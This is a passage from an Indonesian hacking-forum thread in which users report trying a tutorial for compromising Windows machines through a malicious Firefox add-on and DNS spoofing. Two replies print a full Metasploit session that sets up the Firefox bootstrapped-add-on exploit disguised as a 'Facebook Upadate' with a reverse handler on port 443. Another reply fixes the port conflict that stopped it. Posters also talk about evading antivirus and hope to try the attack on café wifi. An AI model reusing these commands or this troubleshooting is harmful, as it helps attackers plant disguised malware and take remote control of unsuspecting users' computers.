[Share] Exploit windows dengan add on dan dns spoof
#21
keren bro , izin praktek Wink

#22
Tadi nyoba metas pake bt 5r3 kok terdetek sebagai virus ya......tapi kalau pake backbox n blackbuntu sukses bypass antivirus avast 6 bajakan hehehehe......jadi Angry

#23
(11-29-2012, 09:35 PM)dvil Wrote:
(11-27-2012, 05:26 PM)copaslamer Wrote: ini vuln di mozilla berapa kak..??


\m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/ \m/

all mozila
kan instal add on
Big Grin:

sedikit memperbaiki, tidak semua add on support dengan semua versi mozilla, tergantung dari versi add on tsb dan versi mozilla Big Grin

#24
om ane pas bagian msfconsole error di bagian akhir..

Spoiler! :
msf exploit(firefox_xpi_bootstrapped_addon) > set addonname Facebook Upadate
addonname => Facebook Upadate
msf exploit(firefox_xpi_bootstrapped_addon) > set srvhost 192.168.1.100
srvhost => 192.168.1.100
msf exploit(firefox_xpi_bootstrapped_addon) > set srvport 80
srvport => 80
msf exploit(firefox_xpi_bootstrapped_addon) > set uripath /
uripath => /
msf exploit(firefox_xpi_bootstrapped_addon) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(firefox_xpi_bootstrapped_addon) > set lport 443
lport => 443
msf exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:443
[-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.1.100:80).

maap pengguna baru, mohon pencerahannya Angry

#25
pas q coba di jaringan wifi, kok koneksinya jadi down semua iaa..
kira" kenapa tu ka.?
mohon pencerahannya..

#26
(02-12-2013, 09:20 PM)fadzim13 Wrote: om ane pas bagian msfconsole error di bagian akhir..

Spoiler! :
msf exploit(firefox_xpi_bootstrapped_addon) > set addonname Facebook Upadate
addonname => Facebook Upadate
msf exploit(firefox_xpi_bootstrapped_addon) > set srvhost 192.168.1.100
srvhost => 192.168.1.100
msf exploit(firefox_xpi_bootstrapped_addon) > set srvport 80
srvport => 80
msf exploit(firefox_xpi_bootstrapped_addon) > set uripath /
uripath => /
msf exploit(firefox_xpi_bootstrapped_addon) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(firefox_xpi_bootstrapped_addon) > set lport 443
lport => 443
msf exploit(firefox_xpi_bootstrapped_addon) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.100:443
[-] Exploit failed: Rex::AddressInUse The address is already in use (192.168.1.100:80).

maap pengguna baru, mohon pencerahannya Angry

maaf kalau sok tau.....itu ada yang jalan di port 80 jadi tabrakan...mungkin apache2 nya lagi jalan,coba di stop dulu...nanti lak bisa.....hehehehe.....:d

#27
keren om,,, coba dulu Smile semoga aja wifi warkop g jadi lambat,, Big Grin

#28
Ijin Nyoba pak bos ,,, ehehhehehe pengguna baru comer ...
Nothing Impossible | Learn, Understand, Share | We Are Staff of Expert Zone Technology

#29
thanks buat tutornya berhasil udah di coba ........ di vmware
echo -f off
#msg * waduh error#
#shutdown -s -c "wkwkwkwk"#
#<?php#
#synatax error <c99.php>#

#30
masih kedetek ama virus ya om.............






Users browsing this thread: 2 Guest(s)